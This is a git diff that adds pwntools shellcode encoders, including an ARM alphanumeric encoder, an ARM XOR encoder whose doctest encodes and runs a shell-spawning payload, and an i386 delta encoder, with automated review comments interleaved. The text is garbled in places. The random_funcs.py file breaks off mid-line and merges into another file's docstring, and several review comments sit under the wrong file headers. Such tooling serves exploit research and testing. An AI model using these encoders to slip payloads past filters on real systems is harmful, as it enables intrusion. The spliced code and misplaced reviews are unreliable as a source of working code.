@@ -0,0 +1,139 @@ + + +# +------------------------------------------------------------------------+ +# | ARM Instructions | +# +------------------------------------------------------------------------+ + + +EOR = 1 +SUB = 2 +RSB = 3 +MI = 4 +PL = 5 +LDR = 6 +STR = 7 +LDM = 8 +STM = 9 +ROR = 10 +LSR = 11 + +# (EOR/SUB/RSB)(PL/MI){S} rd, rn, #imm +# ==================================== +def dpimm(op, cond, s, d, n, imm): + if type(imm) == int: + x = chr(imm & 0xff) + else: + x = imm + x += chr((d << 4) & 0xff) + if s: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + if cond == PL: + x += "\x52" + else: + x += "\x42" + return x + +# (EOR/SUB/RSB)PL{S} rd, rn, ra ROR #imm +# ====================================== +def dpshiftimm(op, s, d, n, a, imm): + x = chr(0x60 | a) + x += chr(((d << 4)| (imm >> 1)) & 0xff) + if s: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + return x + "\x50" + +# (EOR/SUB/RSB)PL{S} rd, rn, ra (ROR/LSR) rb +# ========================================== +def dpshiftreg(op, s, d, n, a, shift, b): + x = '' + if shift == LSR: + x += chr(0x30 | a) + else: + x += chr(0x70 | a) + x += chr(((d << 4) | b) & 0xff) + if s != 0: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + return x + "\x50" + +# (LDR/STR)(PL/MI)B rd, [rn, #-imm] +# ================================= +def lsbyte(op, cond, d, n, imm): + if type(imm) == int: + x = chr(imm & 0xff) + else: + x = imm + x += chr((d << 4) & 0xff) +# x = chr(imm) + chr((d << 4) & 0xff) + if op == STR: + x += chr(0x40 | n) + else: + x += chr(0x50 | n) + if cond == PL: + x += "\x55" + 
else: + x += "\x45" + return x + +# STMPLFD rd, (Register List)^ +# ============================ +def smul(d, reglH, reglL): + return chr(reglL) + chr(reglH) + chr(0x40 | d) + "\x59" + +# LDMPLDB rn!, (Register List) +# ============================ +def lmul(n, reglH, reglL): + return chr(reglL) + chr(reglH) + chr(0x30 | n) + "\x59" + +# SWI(PL/MI) 0x9f0002 +# ============== +def swi(cond): + x = "\x02\x00\x9f" + if cond == MI: + x += "\x4f" + else: + x += "\x5f" + return x + +# BMI 0xfffff4 +# ============ +def bmi(): + return "\xf4\xff\xff\x4b" + +# STRPLB rd, [!rn, -(rm ROR #imm)] with P=0 i.e. post-indexed addressing mode +# =========================================================================== +def sbyteposti(d, n, m, imm): + x = chr(0x60 | m) + x += chr(((d << 4) | (imm >> 1)) & 0xff) + x += chr(0x40 | n) + x += "\x56" + return x diff --git a/pwnlib/encoders/arm/alphanumeric/__init__.py b/pwnlib/encoders/arm/alphanumeric/__init__.py new file mode 100644 index 000000000..3087285bc --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/__init__.py 
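Review bot: `dpimm`, `dpshiftimm` and `dpshiftreg` append no opcode byte when `op == EOR` and `s` is false (only the `s` branch handles EOR), and likewise for any unrecognised `op`, so they return a 3-byte string that is silently wrong instead of failing; add `else: raise ValueError('unsupported op %r' % op)` at the end of each `if` chain. `type(imm) == int` in `dpimm` and `lsbyte` should be `isinstance(imm, int)`, and the commented-out `# x = chr(imm) + chr((d << 4) & 0xff)` in `lsbyte` should be removed. A module docstring explaining that each helper returns the four bytes of one instruction, which operand forms are supported, and what the `EOR`/`SUB`/… and `PL`/`MI` constants select would help readers; the hunk's first lines are in the preceding source line.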
@@ -0,0 +1,47 @@
+import builder
+import binascii
+import random
+import sys
+import string
+
+from ...encoder import Encoder
+from ....context import context
+
+class ArmEncoder(Encoder):
+ arch = 'arm'
+
+ blacklist = {chr(c) for c in range(256) if chr(c) in (string.ascii_letters + string.digits)}
+
+ def __call__(self, input, avoid, pcreg=None):
+
+ icache_flush = 1
+
+ # If randomization is disabled, ensure that the seed
+ # is always the same for the builder.
+ state = random.getstate()
+ if not context.randomize:
+ random.seed(1)
+
+ try:
+ b = builder.builder()
+
+ enc_data = b.enc_data_builder(input)
+ dec_loop = b.DecoderLoopBuilder(icache_flush)
+ enc_dec_loop = b.encDecoderLoopBuilder(dec_loop)
+ dec = b.DecoderBuilder(dec_loop, icache_flush)
+
+ output,dec = b.buildInit(dec);
+
+ output += dec
+ output += enc_dec_loop
+ output += enc_data
+
+ finally:
+ random.setstate(state)
+
+ return output
+
+class ThumbEncoder(ArmEncoder):
+ arch = 'thumb'
+
+encode = ArmEncoder()
diff --git a/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py b/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py
new file mode 100755
index 000000000..0d06cc4c8
--- /dev/null
+++ b/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py
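Review bot: `ArmEncoder.__call__` accepts `avoid` and `pcreg` but never reads them, so a caller's extra avoid-set has no effect and the parameter contract inherited from `Encoder` is not honoured; either check the returned `output` against `avoid` before returning or document that only the alphanumeric alphabet is guaranteed. `import builder` is an implicit relative import (Python 2 only); `from . import builder` matches the explicit relative imports used for `Encoder` and `context` just below it, and `binascii` and `sys` are unused. `blacklist` simplifies to `set(string.ascii_letters + string.digits)`, and `output,dec = b.buildInit(dec);` carries a stray semicolon. `ThumbEncoder` is defined but only `ArmEncoder()` is instantiated as `encode`, so whether the thumb variant is ever registered depends on `Encoder`'s base-class behaviour, which is not visible here.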
@@ -0,0 +1,49 @@ +import random_funcs + +# +------------------------------------------------------------------------+ +# | ALPHANUMERIC MANIPULATIONS FUNCTIONS | +# +------------------------------------------------------------------------+ + +ALPHANUMERIC_BYTES = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + +# return 1 if the byte is alphanumeric +# ==================================== +def alphanumeric_check(c): + if type(c) == int: + c = chr(c & 0xff) + return c.isalnum() + + +# return a random alphanumeric byte +# ================================= +def alphanumeric_get_byte(): + return ord(random_funcs.randel(ALPHANUMERIC_BYTES)) + +# return a randomly selected alphanumeric byte less than max +# ========================================================== +#CSE author actually returns a byte <= max, not strictly < max +def alphanumeric_get_byte_ltmax(max): + sz = 0 + while sz < len(ALPHANUMERIC_BYTES) and ord(ALPHANUMERIC_BYTES[sz]) <= max: + sz += 1 + return ord(random_funcs.randel(ALPHANUMERIC_BYTES[:sz])) + +# generate an alphanumeric offset such that c+offset is also alphanumeric +# ======================================================================= +def off_gen(c): + if c >= 0 and c <= 0x4a: + max = 16 * 7 + 10 - c + while True: + x = alphanumeric_get_byte_ltmax(max) + if alphanumeric_check(c + x): + return x + return 0 + +# return an alphanumeric value ret such that c XOR ret is also alphanumeric +# ========================================================================= +def alphanumeric_get_complement(c): + c &= 0xff; + while True: + ret = alphanumeric_get_byte() + if alphanumeric_check(c ^ ret): + return ret diff --git a/pwnlib/encoders/arm/alphanumeric/alphanumeric.py b/pwnlib/encoders/arm/alphanumeric/alphanumeric.py new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/encoders/arm/alphanumeric/builder.py b/pwnlib/encoders/arm/alphanumeric/builder.py new file mode 100755 index 000000000..aa10a958e --- /dev/null 
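Review bot: `off_gen` returns 0 for any `c` outside `0..0x4a` and `alphanumeric_get_byte_ltmax` hands `randel` an empty slice when `max < ord('0')`, so an out-of-range request does not fail at the call site but leaks a non-alphanumeric immediate into the decoder (or presumably fails later inside `randel`). I'd make both explicit: `raise ValueError('no alphanumeric offset for %#x' % c)` in place of the trailing `return 0`, and `if not sz: raise ValueError('no alphanumeric byte <= %#x' % max)` before the `randel` call. The `#CSE author actually returns a byte <= max` note is correct, so the header comment above it should say `less than or equal to max` rather than `less than max`. `max` shadows the builtin; `limit` would do.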
+++ b/pwnlib/encoders/arm/alphanumeric/builder.py 
@@ -0,0 +1,454 @@ +import random_funcs +import ARM_Instructions +import builder +import alphanum_byte + +#+---------------------------------------------------+*/ +#| Builder Functions |*/ +#+---------------------------------------------------+*/ + +EOR = 1 +SUB = 2 +RSB = 3 +MI = 4 +PL = 5 +LDR = 6 +STR = 7 +LDM = 8 +STM = 9 +ROR = 10 +LSR = 11 + +class builder: + + def __init__(self): + self.I = 0 + self.size = 0 + self.i = 0 + self.j = 0 + self.k = 0 + self.x = 0 + self.addr = 0 + self.addr_offset = 0 + + def enc_data_builder(self, input): + if len(input) == 0: + return '' + output = '' + arr = [1,2,3,4,5,6,7,8,9] + self.I = random_funcs.randel(arr) + p = 0 + for p in range(len(input)): + ab = input[p] + b = ord(ab) & 0x0f + e0 = random_funcs.enc_data_msn(b, self.I) + e0 = e0 << 4 + ef = e0 | b + d = ((ord(ab) & 0xf0) ^ e0) >> 4 + c0 = random_funcs.enc_data_msn(d, self.I) << 4 + cd = c0 | d + output += chr(cd & 0xff) + output += chr(ef & 0xff) + #Last two bytes to stop the decoder_loop*/ + max = 0x30 | self.I + output += chr(alphanum_byte.alphanumeric_get_byte()) + output += chr(alphanum_byte.alphanumeric_get_byte_ltmax(max)) + return output + + def DecoderLoopBuilder(self, icache_flush): + dec_loop = '' + # Select p,s,t and q */ + arr = [3, 7] + p = random_funcs.randel(arr) + if p == 3: + s = 7 + else: + s = 3 + t = 6 + arr2 = [8, 9] + q = random_funcs.randel(arr2) + + # Add the instructions*/ + if icache_flush != 0: + dec_loop += ARM_Instructions.swi(MI) + + rsalnum = alphanum_byte.alphanumeric_get_byte() + + if icache_flush != 0: + #EORMIS rp, r4, #(randomly selected alphanumeric value)*/ + dec_loop += ARM_Instructions.dpimm(EOR, MI, 1, p, 4, rsalnum) + + if icache_flush == 1: + dist = 0x2c + else: + dist = 0x28 + + offset = alphanum_byte.off_gen(dist + 0x04) + + #SUBPL rs, r4, #(dist+0x04+offset)*/ + dec_loop += ARM_Instructions.dpimm(SUB, PL, 0, s, 4, chr(dist + 0x04 + offset)) + + #SUBPL rs, pc, rs LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, 
s, 0x0f, s, LSR, 4) + + #EORPLS rt, r4, rs LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(EOR, 1, t, 4, s, LSR, 4) + + #EORMIS rp, r4, #rsalnum*/ + rsalnum = alphanum_byte.alphanumeric_get_byte() + dec_loop += ARM_Instructions.dpimm(EOR, MI, 1, p, 4, rsalnum) + + #LDRPLB rp, [rs, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(LDR, PL, p, s, offset) + + #SUBPL rs, rs, r5 LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, s, s, 5, LSR, 4) + + #LDRPLB rq, [rs, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(LDR, PL, q, s, offset) + + #EORPLS rp, rq, rp ROR #28*/ + dec_loop += ARM_Instructions.dpshiftimm(EOR, 1, p, q, p, 28) + + #STRPLB rp, [rt, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(STR, PL, p, t, offset) + + #SUBPL rt, rt, r5 LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, t, t, 5, LSR, 4) + + #SUBPL rs, rs, r5 LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, s, s, 5, LSR, 4) + + #RSBPLS rq, rq, #0x3I*/ + dec_loop += ARM_Instructions.dpimm(RSB, PL, 1, q, q, 0x30 | self.I) + + #BMI 0xfffff4*/ + dec_loop += ARM_Instructions.bmi() + + #STRPLB r4, [rt, #-(offset+1)]*/ + dec_loop += ARM_Instructions.lsbyte(STR, PL, 4, t, offset + 1) + + if icache_flush == 1: + #SWIPL 0x9f0002*/ + dec_loop += ARM_Instructions.swi(PL) + return dec_loop + + def encDecoderLoopBuilder(self, input): + output = '' + if len(input) == 0: + return output + for p in input: + if not alphanum_byte.alphanumeric_check(p): + output += chr(alphanum_byte.alphanumeric_get_byte()) + else: + output += p + return output + + def DecoderBuilder(self, input, icache_flush): + if len(input) == 0: + return '' + output = '' + + #Register selections*/ + arr = [4,6] + self.addr = random_funcs.randel(arr) + arr2 = [3, 5, 7] + self.i = random_funcs.randel(arr2) + arr3 = [0, 0] + q = 0 + for p in range(3): + if arr2[p] != self.i: + arr3[q] = arr2[p] + q += 1 + self.j = random_funcs.randel(arr3) + for p in range(2): + if arr3[p] != self.j: + self.k = arr3[p] + break + 
+ self.x = alphanum_byte.off_gen(0x01) + offset = 0x91 + if icache_flush != 0: + output += self.algo1(input, 0, 3) + output += self.gap_traverse(0x1e) + output += self.algo1(input, 33, 5) + else: + output += self.gap_traverse(0x19) + output += self.algo1(input, 25, 5) + output += self.gap_traverse(0x0f) + if icache_flush != 0: + output += self.algo1(input, 53, 15) + else: + output += self.algo1(input, 45, 11) + #trucate the last instruction, which increments raddr by 1, from the output*/ + output = output[:-4] + self.size -= 4 + #Setting r0, r1, r2 for parameter passing*/ + #SUBPLS ri, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 1, self.i, self.i, self.x) + #SUBPL r4, ri, ri LSR ri*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 4, self.i, self.i, LSR, self.i) + #SUBPL r6, ri, ri LSR ri*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 6, self.i, self.i, LSR, self.i) + #SUBPL r5, rj, r4 ROR r6*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 5, self.j, 4, ROR, 6) + + self.size += 4 * 4 + + if icache_flush: + arr4 = [3,7] + m = random_funcs.randel(arr4) + + c = alphanum_byte.off_gen(24) + arr5 = [2,4,6,8,10,12,14,16,18] + arr6 = [4,6] + arr7 = [1,2,4,8] + reglH = 0x40 | random_funcs.randel(arr7) + #SUBPL rm, sp, #(c+24) */ + output += ARM_Instructions.dpimm(SUB, PL, 0, m, 13, c + 24) + + #Store 4 0x00*/ + #STRPLB random_funcs.randel(arr6), [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + + #Store 4 0xff*/ + #STRPLB r5, [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += 
ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + + #Store 4 0x00*/ + #STRPLB random_funcs.randel(arr6), [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + + #SUBPL rm, sp, #c*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, m, 13, c) + + #LDMPLDB rm!, {r0, r1, r2, r6, r8/9/10/11, r14}*/ + output += ARM_Instructions.lmul(m, reglH, 0x47) + + #SUBPLS rm, r5, r4 ROR rm*/ + output += ARM_Instructions.dpshiftreg(SUB, 1, m, 5, 4, ROR, m) + + self.size += 4 * 16 + return output + + def algo1(self, input, begin_inp, iter): + if len(input) == 0: + return '' + output = '' + offset = 0x91 + for p in range(begin_inp, begin_inp + iter): + y = ord(input[p]) + if alphanum_byte.alphanumeric_check(y): + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + self.size += 4 + continue + if y >= 0x80: + if alphanum_byte.alphanumeric_check(~y): + #EORPLS rk, rj, #~y*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, ~y) + #STRMIB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, MI, self.k, self.addr, offset) + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 4 + continue + + a = alphanum_byte.alphanumeric_get_complement(~y) + b = (a ^ ~y) & 
0xff + #EORPLS rk, rj, #a*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, a) + #EORMIS rk, rk, #b*/ + output += ARM_Instructions.dpimm(EOR, MI, 1, self.k, self.k, b) + #STRMIB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, MI, self.k, self.addr, offset) + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 5 + continue + if self.x > y: + z1 = self.x - y + if alphanum_byte.alphanumeric_check(z1): + #SUBPL rk, ri, #z*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.k, self.i, z1) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + z2 = self.x + y + if alphanum_byte.alphanumeric_check(z2): + #RSBPL rk, ri, #z*/ + output += ARM_Instructions.dpimm(RSB, PL, 0, self.k, self.i, z2) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + z3 = self.x ^ y + if alphanum_byte.alphanumeric_check(z3): + #EORPLS rk, ri, #z*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.i, z3) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + a2 = alphanum_byte.alphanumeric_get_complement(z3) + b2 = a2 ^ z3 + #EORPLS rk, ri, #a*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.i, a2) + #EORPLS rk, rk, #b*/ + 
output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.k, b2) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 4 + + + return output + + def gap_traverse(self, gap): + output = '' + g = alphanum_byte.off_gen(gap) + h = g + gap + #SUBPL rj, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x) + #EORPLS rk, rj, #g*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, g) + #SUBPL rk, rk, #h*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.k, self.k, h) + #SUBPL raddr, raddr, rk LSR rj*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.k, LSR, self.j) + #SUBPL rj, ri, #(x+1)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x + 1) + + self.size += 4 * 5 + return output + + + def buildInit(self, input): + if len(input) == 0: + return ('', input) + output = '' + + #Select values of v and w*/ + total = 0x70 + arr1 = [0x30, 0x34, 0x38] + v1 = random_funcs.randel(arr1) + v2 = random_funcs.randel(arr1) + + topv = ((total - (v1 + v2))/4) + 1 + + w1 = random_funcs.randel(arr1) + w2 = random_funcs.randel(arr1) + + topw = ((total - (w1 + w2))/4) + 2 + + arrop = [EOR, SUB, RSB] + arrcond = [PL, MI] + arrs = [0, 1] + arrd = [3, 5, 7] + arrn = [1, 2, 3, 4, 5, 6, 7, 8, 9] + p = 1 + while p <= ((total-8)/4): + op = random_funcs.randel(arrop) + cond = random_funcs.randel(arrcond) + if op == EOR: + s = 1 + else: + s = random_funcs.randel(arrs) + d = random_funcs.randel(arrd) + n = random_funcs.randel(arrn) + if p == topv or p == topw: + output += ARM_Instructions.dpimm(op, cond, s, d, n, self.x) + else: + output += ARM_Instructions.dpimm(op, cond, s, d, n, alphanum_byte.alphanumeric_get_byte()) + p += 1 + + #SUBPL ri, pc, #v1*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.i, 15, v1) + 
#SUBMI ri, pc, #w1*/ + output += ARM_Instructions.dpimm(SUB, MI, 0, self.i, 15, w1) + #LDRPLB ri, [ri, #(-v2)]*/ + output += ARM_Instructions.lsbyte(LDR, PL, self.i, self.i, v2) + #LDRMIB ri, [ri, #(-w2)]*/ + output += ARM_Instructions.lsbyte(LDR, MI, self.i, self.i, w2) + + output += self.algo2() + + #SUBPL rj, ri, #(x+1)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x + 1) + #Initializer built!!*/ + + #Replace 0x91s in decoder with addr_offset*/ + input_new = '' + for p in input: + if p == "\x91": + input_new += chr(self.addr_offset) + else: + input_new += p + return (output, input_new) + + def algo2(self): + output = '' + self.size += 4 + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPLS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 1, self.k, self.i, self.x) + #SUBPL rj, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x) + + quo = (self.size - 4) / 0x7a + if quo >= 1: + for p in range(quo): + #SUBPL rj, rj, #0x7a*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, 0x7a) + + rem = (self.size - 4) % 0x7a + if rem >= 1 and rem <= 0x4a: + self.addr_offset = alphanum_byte.off_gen(rem) + #SUBPL rj, rj, #(offset+rem)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset + rem) + + if rem >= 0x4b and rem < 0x7a: + if alphanum_byte.alphanumeric_check(rem): + self.addr_offset = alphanum_byte.alphanumeric_get_byte() + #SUBPL rj, rj, #(rem)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, rem) + #SUBPL rj, rj, #(offset)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset) + else: + self.addr_offset = alphanum_byte.off_gen(rem - 0x5a) + #SUBPL rj, rj, #0x5a*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, 0x5a) + #SUBPL rj, rj, #(offset + (rem - 0x5a))*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset + rem - 0x5a) + + #SUBPL 
raddr, pc, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, 15, self.j, ROR, self.k) + return output diff --git a/pwnlib/encoders/arm/alphanumeric/random_funcs.py b/pwnlib/encoders/arm/alphanumeric/random_funcs.py new file mode 100755 index 000000000..384d85bc1 --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/random_funcs.py @@ -0,0 +1,36 @@ +import os +import struct +import random + +# +------------------------------------------------------------------------+ +# | RANDOM NUMBERS FUNCTIONS | +# +------------------------------------------------------------------------+ + +# get a random integer i (0<=i>> context.clear(arch='arm') + >>> shellcode = asm(shellcraft.sh()) + >>> avoid = 'binsh\x00\n' + >>> encoded = pwnlib.encoders.arm.xor.encode(shellcode, avoid) + >>> assert not any(c in encoded for c in avoid) + >>> p = run_shellcode(encoded) + >>> p.sendline('echo hello; exit') + >>> p.recvline() + 'hello\n' + """ + + arch = 'arm' + + decoder = """ + adr r8, payload + mov r4, #%(length)s + adr r6, xor_cacheflush +loop: + cmp r4, #%(maximum)s + bxhi r6 + sub r4, r4, #%(length)s + ldrb r5, [r8, r4] + eor r5, r5, #%(key)s + strb r5, [r8, r4] + add r4, r4, #%(length)s + 1 + b loop + +xor_cacheflush: + %(cacheflush)s +payload: + """ + + blacklist = set("\x01\x80\x03\x85\x04\x07\x87\x0c\x8f\x0f\x16\x1c\x9f\x84\xa0%$'-/\xb0\xbd\x81A@\xc2DG\xc6\xc8OPT\xd8_\xe1`\xe3\xe2\xe5\xe7\xe9\xe8\xea\xe0p\xf7") + + def __call__(self, raw_bytes, avoid, pcreg=''): + key, xordata = xor_key(raw_bytes, avoid, size=1) + key = u8(key) + maximum = 256 + length = len(raw_bytes) + cacheflush = shellcraft.arm.linux.cacheflush() + decoder = asm(self.decoder % locals()) + return decoder + xordata + +encode = ArmXorEncoder() diff --git a/pwnlib/encoders/i386/__init__.py b/pwnlib/encoders/i386/__init__.py index 631ae05ec..d4778bac6 100644 --- a/pwnlib/encoders/i386/__init__.py +++ b/pwnlib/encoders/i386/__init__.py @@ -1 +1,2 @@ +from . import delta from . import xor 
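Review bot: In `DecoderLoopBuilder` the SUBPL immediate is passed as a one-character string, `ARM_Instructions.dpimm(SUB, PL, 0, s, 4, chr(dist + 0x04 + offset))`, while every other `dpimm` call in this file (e.g. `dpimm(RSB, PL, 1, q, q, 0x30 | self.I)`, `dpimm(SUB, PL, 0, self.j, self.i, self.x)`) passes a plain int; unless `dpimm` accepts both (its definition is not in this hunk), one of the two forms encodes a wrong byte, and the int form looks like the intended one: `dec_loop += ARM_Instructions.dpimm(SUB, PL, 0, s, 4, dist + 0x04 + offset)`. The module also does `import builder` on itself, which is a no-op at best and a circular import if anything is evaluated at import time; drop it. The `/` divisions in `buildInit` and `algo2` (`topv`, `topw`, `quo`) rely on Python 2 integer division — `//` says so explicitly and survives a port. The `builder` class is contained entirely within this hunk.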
diff --git a/pwnlib/encoders/i386/delta.py b/pwnlib/encoders/i386/delta.py
new file mode 100644
index 000000000..dc492f531
--- /dev/null
+++ b/pwnlib/encoders/i386/delta.py
@@ -0,0 +1,79 @@
+import collections
+from random import randint, choice
+from ...asm import asm
+from ...asm import disasm
+from ...context import context
+from ...util.fiddling import hexdump
+from ..encoder import Encoder
+
+'''
+base:
+ fnop
+ cld
+ fnstenv [esp - 0xc]
+ pop esi
+ /* add esi, data - base */
+ .byte 0x83, 0xc6, data - base
+ mov edi, esi
+next:
+ lodsb
+ xchg eax, ebx
+ lodsb
+ sub al, bl
+ stosb
+ sub bl, 0xac
+ jnz next
+
+data:
+'''
+
+class i386DeltaEncoder(Encoder):
+ r"""
+ i386 encoder built on delta-encoding.
+
+ In addition to the loader stub, doubles the size of the shellcode.
+
+ Example:
+
+ >>> sc = pwnlib.encoders.i386.delta.encode('\xcc', '\x00\xcc')
+ >>> e = ELF.from_bytes(sc)
+ >>> e.process().poll(True)
+ -5
+ """
+
+ arch = 'i386'
+ stub = None
+ terminator = 0xac
+ raw = '\xd9\xd0\xfc\xd9t$\xf4^\x83\xc6\x18\x89\xf7\xac\x93\xac(\xd8\xaa\x80\xeb\xacu\xf5'
+
+ blacklist = set(raw)
+
+ def __call__(self, bytes, avoid, pcreg=''):
+ table = collections.defaultdict(lambda: [])
+ endchar = ''
+
+ not_bad = lambda x: chr(x) not in avoid
+ not_bad_or_term = lambda x: not_bad(x) and x != self.terminator
+
+ for i in filter(not_bad_or_term, range(0, 256)):
+ endchar += chr(i)
+ for j in filter(not_bad, range(0, 256)):
+ table[(j - i) & 0xff].append(chr(i) + chr(j))
+
+ res = self.raw
+
+ for c in bytes:
+ a = ord(c)
+ l = len(table[a])
+ if l == 0:
+ print 'No encodings for character %02x' % a
+ return None
+
+ res += table[a][randint(0, l - 1)]
+
+ res += chr(self.terminator)
+ res += choice(endchar)
+
+ return res
+
+encode = i386DeltaEncoder()
diff --git a/pwnlib/encoders/mips/__init__.py b/pwnlib/encoders/mips/__init__.py
new file mode 100644
index 000000000..631ae05ec
--- /dev/null
+++ b/pwnlib/encoders/mips/__init__.py
@@ -0,0 +1 @@
+from . import xor
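Review bot: The failure path in `i386DeltaEncoder.__call__` uses `print 'No encodings for character %02x' % a` followed by `return None`, so a caller that concatenates the result gets a `TypeError` far from the cause and the diagnostic goes to stdout instead of the pwnlib log; raise instead, e.g. `raise ValueError('No encodings for character %02x with avoid=%r' % (a, avoid))` (or `log.error`, which in pwnlib raises). `choice(endchar)` likewise fails with an opaque `IndexError` when `avoid` excludes every byte other than the terminator; a check `if not endchar: raise ValueError('avoid set leaves no usable terminator byte')` after the table loop names the real problem. The parameter `bytes` shadows the builtin; `raw_bytes` matches the other encoders in this series. `disasm`, `hexdump` and `context` are imported but unused in this file.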
diff --git a/pwnlib/encoders/mips/xor.py b/pwnlib/encoders/mips/xor.py
new file mode 100644
index 000000000..94edbf8d9
--- /dev/null
